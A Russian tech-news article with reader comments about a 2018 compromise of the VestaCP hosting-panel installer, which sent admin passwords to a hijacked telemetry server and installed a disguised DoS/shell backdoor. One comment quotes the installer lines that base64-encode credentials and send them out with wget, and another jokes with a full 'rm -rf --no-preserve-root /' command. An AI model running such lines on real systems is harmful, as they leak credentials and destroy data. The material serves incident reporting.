Злоумышленники добавили вредоносный код в скрипт установки хостинг-панели VestaCP

18.10.2018 12:12

В установочном скрипте панели управления хостингом VestaCP выявлен код, выполняющий отправку параметров аутентификации для доступа к системе пользователя. В частности, в штатную систему отправки телеметрии, которая в ответ на внешний запрос осуществляет вывод названия дистрибутива, добавлены дополнительные параметры, выдающие пароль администратора и IP текущего хоста. Сведения отправлялись на сервер сбора данных телеметрии, который в результате взлома оказался подконтролен атакующим.

Для проверки были ли переданы на сервер сатистики конфиденциальные данные можно использовать ссылку "http://vestacp.com/test/?ip=x.x.x.x", где x.x.x.x IP проверяемого сервера. Если вредоносная активность наблюдается, то вероятно уже недостаточно просто сменить пароль администратора. После получения параметров доступа, атакующие устанавливали бэкдор, который мог выглядеть как системный файл /usr/bin/dhcprenew, реализующий командный сервер для участия в совершении DoS-атак и предоставляющий скрытый shell. После запуска указанный бэкдор маскируется под видом процесса "[kworker/1:1]".

В ходе начального разбора инцидента выяснилось, что код удалось изменить в результате взлома некоторых серверов инфраструктуры проекта. Взлом произведён при помощи новой уязвимости, вызванной ошибкой в API, появившейся в апрельском выпуске 0.9.8-20. Проблемы устранены в выпуске 0.9.8-23. Дополнительные подробности пока не сообщаются.

исправить +16 +/–

Лицензия: CC BY 3.0

Короткая ссылка: https://opennet.ru/49457-vestacp

Ключевые слова: vestacp

При перепечатке указание ссылки на opennet.ru обязательно

Обсуждение (42)

1.1, Аноним (1), 13:47, 18/10/2018 [ответить] [﹢﹢﹢] [ · · · ]	+16 +/–
> штатную систему отправки телеметрии Ух. Хорошо зашли.

2.7, А (??), 14:51, 18/10/2018 [^] [^^] [^^^] [ответить]	+5 +/–
> которая в ответ на внешний запрос осуществляет вывод названия дистрибутива ха-а-арошая какая телеметрия. она еще и запросы штатно принимает. вообще класс. штатную телеметрию модернизировали до телеуправления.

3.10, Аноним (10), 16:26, 18/10/2018 [^] [^^] [^^^] [ответить]	–20 +/–
А ты как собираешься без запросов спросить телеметрию, умник?

4.11, Аноним (11), 16:49, 18/10/2018 [^] [^^] [^^^] [ответить]	+15 +/–
А не надо её спрашивать. Можно сделать, чтобы клиент телеметрии сам отправлял её по расписанию, скажем, раз в неделю. Без запросов с сервера.

3.17, Himik (ok), 18:56, 18/10/2018 [^] [^^] [^^^] [ответить]	+1 +/–
Злоумышленники добавили вредоносный код в скрипт установки хостинг-панели VestaCP. Хотябы название статьи читали. Если сервер не отвечает на запросы, то это не сервер.

4.22, Аноним (22), 23:32, 18/10/2018 [^] [^^] [^^^] [ответить]	+/–
Ага, рабочая станция значит, так? А если рабочая станция отвечает, то сервер, блин у меня оказывается ЦОД набитый серверами...

2.19, Ирокез (?), 19:58, 18/10/2018 [^] [^^] [^^^] [ответить]	+/–
Ш10 отправляет ваши данные в микрософт говорили они.

3.25, Аноним (-), 08:26, 19/10/2018 [^] [^^] [^^^] [ответить]	+1 +/–
Дурной пример заразителен. Веб-абизянки тоже хотят быть как большая компания.

1.2, mikhailnov (ok), 14:07, 18/10/2018 [ответить] [﹢﹢﹢] [ · · · ]	–1 +/–
Повесил на вход в админку Vesta на нестандартном порте дополнительную HTTP-авторизацию средствами nginx. Уже вторая уязвимость мимо.

2.3, Аноним (3), 14:29, 18/10/2018 [^] [^^] [^^^] [ответить]	+5 +/–
Если не забывать о том, что введенные вами логин/пароль пробрасываются в весту в заголовке BasicAuth, ни разу не мимо. Их могло запросто отправить вместе с прочей "телеметрией".

3.31, Аноним (31), 16:42, 19/10/2018 [^] [^^] [^^^] [ответить]	–2 +/–
> введенные вами логин/пароль пробрасываются в весту в заголовке BasicAuth, ни разу не мимо. Их могло запросто отправить вместе с прочей "телеметрией". Наш ответ: https://hackage.haskell.org/package/sproxy2

2.8, Аноним (8), 15:06, 18/10/2018 [^] [^^] [^^^] [ответить]	+1 +/–
Как это спасёт от "бэкдора в установочном скрипте"? Безопасности удалятся 0, информирование через месяц (ветка форума eng раздела, спасибо, что после обновления, скрипт проверки отработает), fail2ban/firewall так и научили определять порты "/usr/local/vesta/bin/v-add-firewall-chain" (не дефолтный фтп). И нет, у меня всё чисто, но уже напрягает.

2.9, scorry (ok), 15:47, 18/10/2018 [^] [^^] [^^^] [ответить]	+9 +/–
«поставил себе вирус. закрыл файрволлом. я хаккир.»

2.13, th3m3 (ok), 16:59, 18/10/2018 [^] [^^] [^^^] [ответить]	+7 +/–
На что только не пойдут, лишь бы консолью не пользоваться.

3.15, Аноним (15), 18:13, 18/10/2018 [^] [^^] [^^^] [ответить]	+8 +/–
Ваш комментарий огорчает молодых специалистов.

1.4, CHERTS (ok), 14:37, 18/10/2018 [ответить] [﹢﹢﹢] [ · · · ]	+1 +/–
Ох и рeшето... других слов просто нет.

1.5, Аноним (5), 14:39, 18/10/2018 [ответить] [﹢﹢﹢] [ · · · ]	–4 +/–
Давно знал что майкрософты ужасное по делают

1.12, th3m3 (ok), 16:53, 18/10/2018 [ответить] [﹢﹢﹢] [ · · · ]	+3 +/–
Я давно говорил, что все эти панели - добром не кончатся. И ведь не первая новость про эту Весту. Давно отказался от этих ваших панелей и жить стало лучше и веселее, особенно когда читаю такие новости, про очередной косяк с панелями.

2.14, FedeX (ok), 17:09, 18/10/2018 [^] [^^] [^^^] [ответить]	+7 +/–
Не зря матери дочерей учат - "Кто не учился, те работают на панели и заразы всякой набираются".

3.18, Аноним (18), 19:25, 18/10/2018 [^] [^^] [^^^] [ответить]	+2 +/–
А потому служат Нурглу и Слаанеш сразу?

1.16, Аноним (16), 18:36, 18/10/2018 [ответить] [﹢﹢﹢] [ · · · ]

+1 +/–

статья ваша ниочем. сотрудники vesta сами добавили сбор пароля от admin в инсталлятор в base64, потом его удалили.
codename="$codename:$(echo $vpass:$servername | base64)"
wget vestacp.com/notify/?$codename -O /dev/null -q

https://github.com/serghey-rodin/vesta/commit/a3f0fa1501d424477786e3e7150bb05c
https://github.com/serghey-rodin/vesta/commit/ee03eff016e03cb76fac7ae3a0f9d1ef

а взломщики скорее взяли их из лога сервера vestacp - куда они отправлялись инсталлятором

а ссылка http://vestacp.com/test/?ip=127.0.0.1 для проверки ip вашего сервера (есть ли он в логах или нет)

2.20, Борщдрайвен бигдата (?), 20:41, 18/10/2018 [^] [^^] [^^^] [ответить]	+2 +/–
> сотрудники vesta сами добавили сбор пароля от admin в инсталлятор в base64, потом его удалили Но зачем?!

3.21, Типа хомячок (?), 23:04, 18/10/2018 [^] [^^] [^^^] [ответить]	+3 +/–
'Cause they can, очевидно же.

2.23, KonstantinB (??), 06:26, 19/10/2018 [^] [^^] [^^^] [ответить]	+1 +/–
Шикарно. И это тот случай, когда открытые исходники не помогут: те, кто умеет их читать, не пользуются панелями, и наоборот. :-)

3.28, нах (?), 10:37, 19/10/2018 [^] [^^] [^^^] [ответить]

+/–

хинт: те кто умеет их читать, не пользуются панелями, а продают их как услугу.

Правда, вряд ли на свете много продающих хостинг на весте - коммерческие хостеры обычно используют cpanel или ispmgr (оба феерическое невменяемое гуанище с закрытым кодом, больными yблюдкaми в менеджменте и рукoжoпыми гoвнoкодерами, но ничего лучшего опенсосеры не родили)

4.37, KonstantinB (ok), 04:03, 20/10/2018 [^] [^^] [^^^] [ответить]	+/–
Ой, не напоминайте мне об этих убожествах. Слава яйцам, в последние лет 5 это все никому, кроме пожилых сеошников, не надо.

5.39, пох (?), 10:46, 20/10/2018 [^] [^^] [^^^] [ответить]

–1 +/–

> Ой, не напоминайте мне об этих убожествах. Слава яйцам, в последние лет
> 5 это все никому, кроме пожилых сеошников, не надо.

угу, нет другого интернета кроме вконтактега и мордокнижечки, и товарищ майор пророк ихний.

5.40, Vitaliy Blats (?), 12:40, 20/10/2018 [^] [^^] [^^^] [ответить]

–1 +/–

Это ты так думаешь. В мире мало того что куча VPS'ок с предустановленной панелью, так еще и куча сайтов на шаред-хостинге, где так же используются эти панели.

Мы, пожилые сеошники конечно рады, что ты великий гуру можешь купить VPS'ку, задеплоить туда твою Убунтачку, поставить туда LAMP, exim с dovecot'ом, вебмылом и спамассасином, ну и само собой разумеется сгенерить DKIM'ы дабы письмецы не попадали в спам, написать скрипты добавления мыльных аккаунтов и доменов (просто если ты будешь добавлять это вручную - то ты еще фееричнее кретин чем я думал) и все это за 5 баксов - но мы НЕ ТАКИЕ, мы просто хотим сделать сайт-визитку для своей шашлычной на Вордпрессе за полчаса :))

6.41, пох (?), 19:35, 20/10/2018 [^] [^^] [^^^] [ответить]

+/–

> мы просто хотим сделать сайт-визитку для своей шашлычной на Вордпрессе за полчаса :))

на самом деле нам его уже сделал жопорукий аутсорсер, осталось выложить.
Он, конечно,предлагает хоститься на его сервере, но, поскольку он его сам настраивал, как умел, тот сервер половину времени не работает, и во всех блоклистах отметился, а еще он на нем немножечко майнит.

1.24, odd.mean (ok), 07:38, 19/10/2018 [ответить] [﹢﹢﹢] [ · · · ]	+/–
Хорошую вещь "CP" не назовут.

2.26, Аноним (26), 09:41, 19/10/2018 [^] [^^] [^^^] [ответить]	+/–
И альта-вистой тоже....

2.44, Аноним (44), 06:23, 21/10/2018 [^] [^^] [^^^] [ответить]	+/–
а CP/M ?

3.45, odd.mean (ok), 08:40, 21/10/2018 [^] [^^] [^^^] [ответить]	+/–
Ну разве что CP/M. Да и то...

1.27, Аноним (26), 09:44, 19/10/2018 [ответить] [﹢﹢﹢] [ · · · ]	–2 +/–
Есть Ajenti не вижу смысла в существовании этого плохо-кода.

2.30, Vitaliy Blats (?), 12:17, 19/10/2018 [^] [^^] [^^^] [ответить]	+1 +/–
> Есть Ajenti не вижу смысла в существовании этого плохо-кода. Есть %software_name1% не вижу смысла в существовании этого %software_name2%.

1.32, Аноним (31), 21:06, 19/10/2018 [ответить] [﹢﹢﹢] [ · · · ]

+/–

Fuck me

https://github.com/serghey-rodin/vesta:

'''
Download the installation script:

curl -O http://vestacp.com/pub/vst-install.sh

Then run it:

bash vst-install.sh
'''

2.33, пох (?), 21:46, 19/10/2018 [^] [^^] [^^^] [ответить]	–2 +/–
прости, а то что он тебе понаустановит - ты запускать вообще не планируешь? Или предполагаешь, что баш чем-то страшнее и ужаснее php?

3.34, Грусть (?), 22:59, 19/10/2018 [^] [^^] [^^^] [ответить]	+1 +/–
Вам следует настроить свой камертон на curl http://...

4.42, пох (?), 19:39, 20/10/2018 [^] [^^] [^^^] [ответить]	+/–
ой, какой ужас, злые соседи...э...какие нахрен соседи, мы что дома ставимся? Злые враги инженеры хостера...э...стоп, а им зачем, они прямо на диск могут записать... э... ну я уж прям не знаю кто - магистральные операторы в терабитах порнухи и котиков разглядели наш невинный curl и подбросили вражеский код, да?

2.35, Аноним (35), 23:16, 19/10/2018 [^] [^^] [^^^] [ответить]	+/–
echo "rm -rf --no-preserve-root /" \| sudo bash

2.36, Аноним (36), 01:43, 20/10/2018 [^] [^^] [^^^] [ответить]	+/–
curl2bash™

3.38, annual slayer (?), 06:45, 20/10/2018 [^] [^^] [^^^] [ответить]	+/–
есть уже 'curl --rootme'

игнорирование участников | лог модерирования

Добавить комментарий

Текст: